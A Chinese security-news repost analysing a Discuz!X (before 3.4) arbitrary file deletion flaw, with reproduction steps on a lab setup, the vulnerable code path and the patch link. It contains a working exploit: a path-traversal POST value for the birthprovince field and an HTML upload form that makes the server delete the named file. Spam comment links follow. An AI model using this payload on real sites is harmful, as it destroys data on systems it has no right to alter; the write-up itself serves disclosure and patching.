黑基网 首页 资讯 安全圈 查看内容

Discuz!X前台任意文件删除漏洞重现及分析

2017-10-8 03:23| 投稿: lofor |来自: 互联网

摘要: 首页分类阅读文库专栏公开课商城企业服务用户服务注册|登录投稿Discuz!X前台任意文件删除漏洞重现及分析LSA2017-10-07共66974人围观WEB安全漏洞0×00概述9月29日,Discuz修复了一个前台任意文件删除的漏洞,相似的漏 ...

Discuz!X前台任意文件删除漏洞重现及分析

2017-10-0766974人围观WEB安全漏洞

0×00 概述

9月29日,Discuz修复了一个前台任意文件删除的漏洞,相似的漏洞曾在2014年被提交给wooyun和discuz官方,但是修复不完全导致了这次的漏洞。

0×01 影响范围

Discuz < 3.4 

0×02 漏洞重现

环境:win7+phpstudy+discuz3.2

新建importantfile.txt作为测试

进入设置-个人资料,先在页面源代码找到formhash值

http://10.0.2.15:8999/discuz3_2/home.php?mod=spacecp&ac=profile

可以看到formhash值是b21b6577。

再访问10.0.2.15:8999/discuz3_2/home.php?mod=spacecp&ac=profile&op=base

Post数据:birthprovince=../../../importantfile.txt&profilesubmit=1&formhash=b21b6577

如图

执行后

出生地被修改成要删除的文件。

最后构造表单执行删除文件

<form action=”http://10.0.2.15:8999/discuz3_2/home.php?mod=spacecp&ac=profile&op=base” method=”POST” enctype=”multipart/form-data”>

<input type=”file” name=”birthprovince” id=”file” />

<input type=”text” name=”formhash” value=”b21b6577″/></p>

<input type=”text” name=”profilesubmit” value=”1″/></p>

<input type=”submit” value=”Submit” />

</from>

随便上传一张图片,即可删除importantfile.txt

成功删除importantfile.txt,重现成功!

0×03 修复方案

https://gitee.com/ComsenzDiscuz/DiscuzX/commit/7d603a197c2717ef1d7e9ba654cf72aa42d3e574

删除unlink相关代码。

0×04 漏洞分析

根据补丁,漏洞存在于upload/source/include/spacecp/spacecp_profile.php。

先看第70行

if(submitcheck(‘profilesubmit’)) {

提交1进入这个判断。

来到220行,补丁前:

往上看来到:

可以看出文件上传成功就可以进入228行的unlink从而删除指定文件。

现在就看如何控制指定文件,也就是控制$space[$key]这个变量。

继续往上看来到:

可以看出space存用户资料,就可以利用space[birthprovince]存要删除的文件。

那如何修改birthprovince为指定文件呢,直接post提交就绕过限制了。

总结整个漏洞利用流程:

修改birthprovince->上传图片->执行unlink->删除任意文件

0×05 结语

删文件……,大家不要乱搞,该补的赶紧补,discuz树大招风,2014的补丁又不补完全,正是这样攻与防的不断博弈,使安全界生机勃勃,妙趣横生,也使互联网愈发安全稳固。

0×06 参考资料

https://www.seebug.org/vuldb/ssvid-96608

https://www.seebug.org/vuldb/ssvid-93588

https://gitee.com/ComsenzDiscuz/DiscuzX/commit/7d603a197c2717ef1d7e9ba654cf72aa42d3e574

https://gitee.com/ComsenzDiscuz/DiscuzX/blob/7d603a197c2717ef1d7e9ba654cf72aa42d3e574/upload/source/include/spacecp/spacecp_profile.php

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

发表评论

最新评论

引用 游客 2017-11-30 14:51
LjeykG  <a href="http://edjgstbifgry.com/">edjgstbifgry</a>, [url=http://zhujhkezzmjp.com/]zhujhkezzmjp[/url], [link=http://hgmhzpueucuz.com/]hgmhzpueucuz[/link], http://hrxfemlcgoak.com/
引用 游客 2017-11-28 02:15
I3ONgp http://www.LnAJ7K8QSpfMO2wQ8gO.com

查看全部评论(2)


新出炉

返回顶部